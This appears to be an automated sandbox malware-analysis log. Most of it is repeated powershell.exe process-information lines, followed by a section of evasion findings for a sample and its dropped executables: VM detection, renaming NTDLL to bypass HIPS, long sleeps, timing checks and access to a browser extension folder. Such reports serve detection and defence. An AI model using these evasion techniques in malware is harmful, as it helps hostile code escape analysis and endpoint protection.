Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\7c8ebbc4-8deb-40dd-b0f8-2d1ec9a44654\AdvancedRun.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX

Malware Analysis System Evasion:

barindex
Checks if the current machine is a virtual machine (disk enumeration)
Source: C:\Users\user\Desktop\F7E3DjYJpC.exe Key enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSI Jump to behavior
Source: C:\Users\user\Desktop\F7E3DjYJpC.exe Key enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSI Jump to behavior
Source: C:\Users\user\Desktop\F7E3DjYJpC.exe Key enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSI Jump to behavior
Source: C:\Users\user\Desktop\F7E3DjYJpC.exe Key enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSI Jump to behavior
Source: C:\Users\user\Desktop\F7E3DjYJpC.exe Key enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSI Jump to behavior
Source: C:\Users\user\Desktop\F7E3DjYJpC.exe Key enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSI Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\9A4B.exe Key enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSI Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\9A4B.exe Key enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSI Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\9A4B.exe Key enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSI Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\9A4B.exe Key enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSI Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\9A4B.exe Key enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSI Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\9A4B.exe Key enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSI Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\20BD.exe Key enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSI Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\20BD.exe Key enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSI Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\20BD.exe Key enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSI Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\20BD.exe Key enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSI Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\20BD.exe Key enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSI Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\20BD.exe Key enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSI Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\46D6.exe Key enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSI
Source: C:\Users\user\AppData\Local\Temp\46D6.exe Key enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSI
Source: C:\Users\user\AppData\Local\Temp\46D6.exe Key enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSI
Source: C:\Users\user\AppData\Local\Temp\46D6.exe Key enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSI
Source: C:\Users\user\AppData\Local\Temp\46D6.exe Key enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSI
Source: C:\Users\user\AppData\Local\Temp\46D6.exe Key enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSI
Source: C:\Users\user\AppData\Roaming\iwbavbe Key enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSI
Source: C:\Users\user\AppData\Roaming\iwbavbe Key enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSI
Source: C:\Users\user\AppData\Roaming\iwbavbe Key enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSI
Source: C:\Users\user\AppData\Roaming\iwbavbe Key enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSI
Source: C:\Users\user\AppData\Roaming\iwbavbe Key enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSI
Source: C:\Users\user\AppData\Roaming\iwbavbe Key enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSI
Renames NTDLL to bypass HIPS
Source: C:\Users\user\AppData\Local\Temp\20BD.exe File opened: C:\Windows\SysWOW64\ntdll.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\20BD.exe File opened: C:\Windows\SysWOW64\ntdll.dll Jump to behavior
May sleep (evasive loops) to hinder dynamic analysis
Source: C:\Users\user\AppData\Local\Temp\31F4.exe TID: 2900 Thread sleep time: -922337203685477s >= -30000s Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\5483.exe TID: 3684 Thread sleep time: -60000s >= -30000s
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 492 Thread sleep time: -2767011611056431s >= -30000s
Contains long sleeps (>= 3 min)
Source: C:\Users\user\AppData\Local\Temp\31F4.exe Thread delayed: delay time: 922337203685477 Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Source: C:\Windows\explorer.exe Window / User API: threadDelayed 603 Jump to behavior
Source: C:\Windows\explorer.exe Window / User API: threadDelayed 363 Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 4777
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 3766
Found dropped PE file which has not been started or loaded
Source: C:\Windows\explorer.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\3D90.exe Jump to dropped file
Source: C:\Windows\explorer.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\39A7.exe Jump to dropped file
Source: C:\Windows\explorer.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\2CF4.exe Jump to dropped file
Contains functionality for execution timing, often used to detect debuggers
Source: C:\Users\user\AppData\Local\Temp\20BD.exe Code function: 20_2_6AB96B90 rdtsc 20_2_6AB96B90
Source: C:\Users\user\AppData\Local\Temp\31F4.exe Thread delayed: delay time: 922337203685477 Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477
Source: C:\Users\user\AppData\Local\Temp\5483.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.5_0\html\
Source: C:\Users\user\AppData\Local\Temp\5483.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.5_0\_locales\
Source: C:\Users\user\AppData\Local\Temp\5483.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.5_0\
Source: C:\Users\user\AppData\Local\Temp\5483.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.5_0\images\
Source: C:\Users\user\AppData\Local\Temp\5483.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.5_0\_locales\bg\
Source: C:\Users\user\AppData\Local\Temp\5483.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.5_0\css\
Source: explorer.exe, 00000006.00000000.721694539.000000000FDAA000.00000004.00000001.sdmp Binary or memory string: AGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000025700000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#000000001F400000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000026700000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000000100000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_Msft&Prod_Virtual_DVD-ROM#2&1f4adffe&0&000001#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
